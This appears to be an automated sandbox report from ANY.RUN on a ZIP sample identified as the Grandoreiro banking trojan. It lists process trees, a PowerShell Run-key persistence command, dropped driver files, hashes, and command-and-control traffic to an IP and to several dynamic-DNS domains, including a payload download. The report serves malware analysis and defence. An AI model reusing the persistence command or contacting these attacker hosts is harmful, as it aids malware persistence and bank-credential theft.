File name: MercadFinancEQEFoopnGVRKXRHTqobyXVMLovbg.zip

Full analysis: https://app.any.run/tasks/892e2e3a-b596-4a89-b389-a79afbfc9409
Verdict: Malicious activity
Threats:

Grandoreiro is a Latin American banking trojan first observed in 2016. It mostly targets Spanish-speaking countries such as Brazil, Spain, Mexico and Peru. The malware is operated as Malware-as-a-Service (MaaS), which makes it readily available to cybercriminals, and it uses advanced techniques to evade detection.

Analysis date: December 19, 2023, 19:56:08
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: evasion, grandoreiro, banker, realthinclient, remote
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5: 8EB5E1E3EF6E45D6DBFC1A744CA5D20E
SHA1: EB51B7C94C672FDB7302F4623894ABC1399927E6
SHA256: B9A6DDB37AEFA1A9A81F95A22B73339A7793F641D326BFB218A5551DAF0EF2A8
SSDEEP: 98304:VucXoVZmQFRIse2575xblVlBpHNaO67xRisj+BRYjj3a0hpRlH820mxKLplef+cT:kYUw1vN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Actions looks like stealing of personal data

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
    • GRANDOREIRO has been detected (SURICATA)

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
    • Drops the executable file immediately after the start

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
    • REALTHINCLIENT has been detected (SURICATA)

      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
    • Create files in the Startup directory

      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • WinRAR.exe (PID: 2040)
      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
    • Checks for external IP

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
    • Connects to unusual port

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
    • Reads the Internet Settings

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
      • sipnotify.exe (PID: 1944)
    • Drops a system driver (possible attempt to evade defenses)

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
    • Connects to the server without a host name

      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
    • Starts CMD.EXE for commands execution

      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
    • The process executes via Task Scheduler

      • ctfmon.exe (PID: 660)
      • sipnotify.exe (PID: 1944)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3908)
      • cmd.exe (PID: 1344)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
    • Reads settings of System Certificates

      • sipnotify.exe (PID: 1944)
  • INFO

    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 2040)
    • Checks supported languages

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 1504)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
      • IMEKLMG.EXE (PID: 2096)
      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2556)
      • IMEKLMG.EXE (PID: 2104)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 2120)
      • wmpnscfg.exe (PID: 2372)
      • wmpnscfg.exe (PID: 2400)
    • Reads the computer name

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 1504)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2556)
      • IMEKLMG.EXE (PID: 2096)
      • IMEKLMG.EXE (PID: 2104)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 2120)
      • wmpnscfg.exe (PID: 2372)
      • wmpnscfg.exe (PID: 2400)
    • Reads the machine GUID from the registry

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 2120)
    • Reads CPU info

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 1504)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2556)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 2120)
    • Manual execution by a user

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 1504)
      • msedge.exe (PID: 764)
      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2556)
      • chrome.exe (PID: 3332)
      • IMEKLMG.EXE (PID: 2096)
      • IMEKLMG.EXE (PID: 2104)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 2120)
      • wmpnscfg.exe (PID: 2372)
      • wmpnscfg.exe (PID: 2400)
    • Creates files in the program directory

      • UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe (PID: 2208)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
    • Application launched itself

      • msedge.exe (PID: 764)
      • chrome.exe (PID: 3332)
    • Reads Environment values

      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 2120)
    • Reads product name

      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 2120)
    • Checks proxy server information

      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
    • Changes the registry key values via Powershell

      • cmd.exe (PID: 3908)
      • cmd.exe (PID: 1344)
      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
    • Creates files or folders in the user directory

      • fgaennProDriverUtilityvdqaDriverRestoreWizard.exe (PID: 584)
    • Reads security settings of Internet Explorer

      • sipnotify.exe (PID: 1944)
    • Process checks are UAC notifies on

      • IMEKLMG.EXE (PID: 2096)
      • IMEKLMG.EXE (PID: 2104)
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2023:12:19 13:21:46
ZipCRC: 0xeac6e793
ZipCompressedSize: 2145981
ZipUncompressedSize: 126647808
ZipFileName: UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
All screenshots are available in the full report
Total processes: 124
Monitored processes: 42
Malicious processes: 3
Suspicious processes: 1


Process information

PID
CMD
Path
Indicators
Parent process
PID: 124
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2292 --field-trial-handle=1108,i,17561323652896429728,16165680235525502401,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:1
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
109.0.5414.120
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\109.0.5414.120\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
PID: 240
CMD: powershell.exe -Command ""Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name SteamDefenser2,$74VD,5/BN -Value 'C:\ProgramData\fgamcbiDriverMaintenanceUtility\fgaennProDriverUtilityvdqaDriverRestoreWizard.exe'""
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 584
CMD: "C:\ProgramData\fgamcbiDriverMaintenanceUtility\fgaennProDriverUtilityvdqaDriverRestoreWizard.exe"
Path: C:\ProgramData\fgamcbiDriverMaintenanceUtility\fgaennProDriverUtilityvdqaDriverRestoreWizard.exe
Parent process: UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
User:
admin
Company:
Valve Corporation
Integrity Level:
MEDIUM
Description:
gameanticheater.exe
Exit code:
1073807364
Version:
9.57.39.64
Modules
Images
c:\programdata\fgamcbidrivermaintenanceutility\fgaennprodriverutilityvdqadriverrestorewizard.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\mpr.dll
c:\windows\system32\winmm.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
PID: 660
CMD: C:\Windows\System32\ctfmon.exe
Path: C:\Windows\System32\ctfmon.exe
Parent process: taskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CTF Loader
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ctfmon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msctfmonitor.dll
c:\windows\system32\msctf.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
PID: 764
CMD: "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\admin\Desktop\______________________________________________________________________________________492390749421.xml
Path: C:\Program Files\Microsoft\Edge\Application\msedge.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 884
CMD: "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3792 --field-trial-handle=1328,i,15837457835844739249,15455360011907069847,131072 /prefetch:8
Path: C:\Program Files\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 884
CMD: powershell.exe -Command "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name SteamDefenser2,$74VD,5/BN -Value 'C:\ProgramData\fgamcbiDriverMaintenanceUtility\fgaennProDriverUtilityvdqaDriverRestoreWizard.exe'"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: fgaennProDriverUtilityvdqaDriverRestoreWizard.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 996
CMD: "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --first-renderer-process --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2292 --field-trial-handle=1328,i,15837457835844739249,15455360011907069847,131072 /prefetch:1
Path: C:\Program Files\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 1112
CMD: "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=109.0.5414.149 "--annotation=exe=C:\Program Files\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win32 "--annotation=prod=Microsoft Edge" --annotation=ver=109.0.1518.115 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd8,0x6d8ff598,0x6d8ff5a8,0x6d8ff5b4
Path: C:\Program Files\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
109.0.1518.115
Modules
Images
c:\program files\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\edge\application\109.0.1518.115\msedge_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 1344
CMD: cmd.exe /C powershell.exe -Command ""Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name SteamDefenser2,$74VD,5/BN -Value 'C:\ProgramData\fgamcbiDriverMaintenanceUtility\fgaennProDriverUtilityvdqaDriverRestoreWizard.exe'""
Path: C:\Windows\System32\cmd.exe
Parent process: fgaennProDriverUtilityvdqaDriverRestoreWizard.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events: 11 453
Read events: 11 347
Write events: 105
Delete events: 1

Modification events

Process: (2040) WinRAR.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

Process: (2040) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 3
Value: C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip

Process: (2040) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 2
Value: C:\Users\admin\Desktop\phacker.zip

Process: (2040) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 1
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip

Process: (2040) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip

Process: (2040) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

Process: (2040) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

Process: (2040) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120

Process: (2040) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: mtime
Value: 100

Process: (2040) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
Operation: write
Name: name
Value: 120
Executable files: 75
Suspicious files: 108
Text files: 79
Unknown types: 0

Dropped files

PID
Process
Filename
Type
PID 2040, WinRAR.exe: C:\Users\admin\Desktop\UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
MD5:
SHA256:

PID 2208, UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: C:\ProgramData\fgamcbiDriverMaintenanceUtility\bUylUaDbz
MD5:
SHA256:

PID 2208, UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: C:\ProgramData\fgamcbiDriverMaintenanceUtility\nFKrVvJ.exe
MD5:
SHA256:

PID 2208, UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: C:\ProgramData\fgamcbiDriverMaintenanceUtility\acpitime.sys (executable)
MD5: 1E3AA6E71FC72290352E415B0F99ED44
SHA256: 35ECCB1C8E3039B07DE3B0DA58BFEAC7F77EF87E0724221A12F93E4C9F85D743

PID 2208, UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: C:\ProgramData\fgamcbiDriverMaintenanceUtility\amdi2c.sys (executable)
MD5: D0E26E590DE1424CCC4F77D1687049EF
SHA256: 387811D57DEF06C9736D9F0BAB0DFB0F83DBAB19E5489BF9A6DCDCBD682DD8FE

PID 2208, UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: C:\ProgramData\fgamcbiDriverMaintenanceUtility\AcpiDev.sys (executable)
MD5: 1BA19D7AF3DCB34F4EF12A8EAD1521BD
SHA256: E4C5495E2619E67E4EFA171D072079AE27C732C1180327B0630BCCDCD9E5476D

PID 2208, UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: C:\ProgramData\fgamcbiDriverMaintenanceUtility\acpipagr.sys (executable)
MD5: 72790ADEC8537AFC3FC6978BDE47F028
SHA256: F448B24D2831A97AF21123698FFFE4D6E488066ED9FE223DD5886662426F57FB

PID 2208, UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: C:\ProgramData\fgamcbiDriverMaintenanceUtility\amdxata.sys (executable)
MD5: 03E71A2182C900046A4E688C2A9ECFC1
SHA256: D9BA91DA1EA1CE8B9869CD7C65BDE4713BBA0C716E22506DF45F7AC26322FF21

PID 2208, UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: C:\ProgramData\fgamcbiDriverMaintenanceUtility\aswElam.sys (executable)
MD5: EE094BE866815925B7AC128B8D90168F
SHA256: C6DA90F3871BFE930113F80CD451EEA22E550E416579764F3647CAC4B204BA0B

PID 2208, UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: C:\ProgramData\fgamcbiDriverMaintenanceUtility\amdgpio2.sys (executable)
MD5: 55578CF027B0AE9F0D653B209C9F1B6D
SHA256: 46A53925BAA34FA9D87E7C3157504A4557D81CD8B8608E7AB6CAF02F482F7792
HTTP(S) requests: 28
TCP/UDP connections: 52
DNS requests: 28
Threats: 32

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
PID 2208, UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: GET, HTTP 200, 208.95.112.1:80
URL: http://ip-api.com/json
CN: unknown; Type: binary; Size: 289 b; Reputation: unknown

PID 2208, UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: GET, HTTP 200, 208.95.112.1:80
URL: http://ip-api.com/json
CN: unknown; Type: binary; Size: 289 b; Reputation: unknown

PID 2208, UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: GET, HTTP 200, 208.95.112.1:80
URL: http://ip-api.com/json
CN: unknown; Type: binary; Size: 289 b; Reputation: unknown

PID 2208, UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: GET, HTTP 200, 208.95.112.1:80
URL: http://ip-api.com/json
CN: unknown; Type: binary; Size: 289 b; Reputation: unknown

PID 2208, UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: GET, HTTP 200, 208.95.112.1:80
URL: http://ip-api.com/json
CN: unknown; Type: binary; Size: 289 b; Reputation: unknown

PID 2208, UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: GET, HTTP 200, 54.94.102.59:9479
URL:
http://54.94.102.59:9479/GQWT)WQUCSP,,)G$)CTUUC@*QGPT))QS*QQU)GV*%25G@U%25QUQ)@),Q*,GXWTVUP,QQS$UU@PPCP*@T,@WV)$)UX@G,GQUP@$WSX*SQV$GX)G$P)CTC)GW@TSV,*UW,XXGUWQP,UU,)QUW$%25G%25$XTSU)**XQVXXCQ@CWCPV%25%25CTGVX%25GS@@P@PW*VS%25@QQP%25SW,GXTVC*CXSQ,CS$,VV%25WVT%25TT,TGQQCGVQW%25)*SG,CQU%25CQ*,%25Q%25*%25GP%25QPPPGCS*WTQ)PVX@Q@)VX,@UCP$*@QW,GTGTPQ%25,)TVU%25@Q@%25W*GQWCQT$XGSWUS$XXQT$SXTTUSWV$VUPS)VTV%25UUQ,VUP*,UU$STV)*UV%25WUQP)P,$,QU$%25TCGTGXSU*VT%25*,UP$UGV*PX$GV,)TVV,C%25%25$*WTTG*$VS)CVXCPC$SW,@QUCGPU%25TV%25$%25VT,@SX$S*CXV%25)T%25QQXCQ)UPP@QCT,,QQCWST%25VSQPC*VTQXWG,)*T$SC*%25TGG)*)QC,PT))%25QV,UTWU%25*,XQQQ,GU@CVP),CQU*WUWPC%25,SU$%25TV%25PVG,%25W)GQ%25U%25G*,X*WGVS$UG$GQX%25)UV,*U,CQSQC@VQG,)SXXW$VUP*GSU,%25X@WTQP$@TU*UQ@CP*)T@S$UU@,CXQT*X%25UUCSSTCG)QT*TXXVX*VSPQ$TGSWQ%25VU$,SUGCQ@PGW)*VV)U@GCS,GU*P*SG$GWSTGG)$SQX,PQXC%25*GVC*QXGUQ$)W$S$GUQCQP**,U,$QXVU)PW,,UUC$GT$UGQXVW,*CXCW)%25CQ%25CQ*PXUQT@,%25,X*QGPQ*SUQP%25%25$QT,@T$W%25GP*@TCT)T*
CN: unknown; Type: text; Size: 790 b; Reputation: unknown

PID 2208, UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: GET, HTTP 200, 54.94.102.59:30819
URL: http://54.94.102.59:30819/nFKrVvJ.xml
CN: unknown; Type: binary; Size: 6.03 Mb; Reputation: unknown

PID 2208, UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: GET, HTTP 200, 54.94.102.59:9479
URL:
http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
CN: unknown; Type: text; Size: 50 b; Reputation: unknown

PID 2208, UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: GET, HTTP 200, 54.94.102.59:157
URL:
http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
CN: unknown; Type: text; Size: 50 b; Reputation: unknown

PID 584, fgaennProDriverUtilityvdqaDriverRestoreWizard.exe: GET, HTTP 200, 208.95.112.1:80
URL: http://ip-api.com/json
CN: unknown; Type: binary; Size: 289 b; Reputation: unknown

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
  • (no PID/process listed) 224.0.0.252:5355, reputation unknown
  • 4 System: 192.168.100.255:138, reputation whitelisted
  • 4 System: 192.168.100.255:137, reputation whitelisted
  • 2208 UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: 208.95.112.1:80, ip-api.com, ASN TUT-AS, CN US, reputation unknown
  • 2208 UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: 54.94.102.59:9479, mellforsellss.pointto.us, ASN AMAZON-02, CN BR, reputation unknown
  • 2208 UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: 54.94.102.59:30819, mellforsellss.pointto.us, ASN AMAZON-02, CN BR, reputation unknown
  • 764 msedge.exe: 239.255.255.250:1900, reputation whitelisted
  • 2248 msedge.exe: 13.107.42.16:443, config.edge.skype.com, ASN MICROSOFT-CORP-MSN-AS-BLOCK, CN US, reputation whitelisted
  • 2248 msedge.exe: 204.79.197.239:443, edge.microsoft.com, ASN MICROSOFT-CORP-MSN-AS-BLOCK, CN US, reputation unknown
  • 2208 UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: 54.94.102.59:157, mellforsellss.pointto.us, ASN AMAZON-02, CN BR, reputation unknown

DNS requests

Domain
IP
Reputation
ip-api.com
  • 208.95.112.1
shared
mellforsellss.pointto.us
  • 54.94.102.59
unknown
config.edge.skype.com
  • 13.107.42.16
whitelisted
edge.microsoft.com
  • 204.79.197.239
  • 13.107.21.239
whitelisted
www.bing.com
  • 2.16.100.43
  • 2.16.100.34
  • 2.16.101.105
  • 2.16.100.27
  • 2.16.100.24
  • 2.16.101.120
  • 2.16.100.35
  • 2.16.100.17
  • 2.16.101.113
whitelisted
msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
  • 152.199.21.175
whitelisted
self.events.data.microsoft.com
  • 20.189.173.11
whitelisted
wojgmeojoammdlgfa.hosthampster.com
  • 54.233.106.185
unknown
mjolqjmdgalmdlgfa.hosthampster.com
  • 158.247.7.206
unknown
maejgomdmmdlgfa.buyshouses.net
  • 15.229.111.58
unknown

Threats

PID
Process
Class
Message
  • 2208 UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: Potential Corporate Privacy Violation; AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
  • 2208 UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: Device Retrieving External IP Address Detected; ET POLICY External IP Lookup ip-api.com
  • 2208 UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: Potential Corporate Privacy Violation; AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
  • 2208 UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: Device Retrieving External IP Address Detected; ET POLICY External IP Lookup ip-api.com
  • 2208 UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: Potential Corporate Privacy Violation; AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
  • 2208 UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: Device Retrieving External IP Address Detected; ET POLICY External IP Lookup ip-api.com
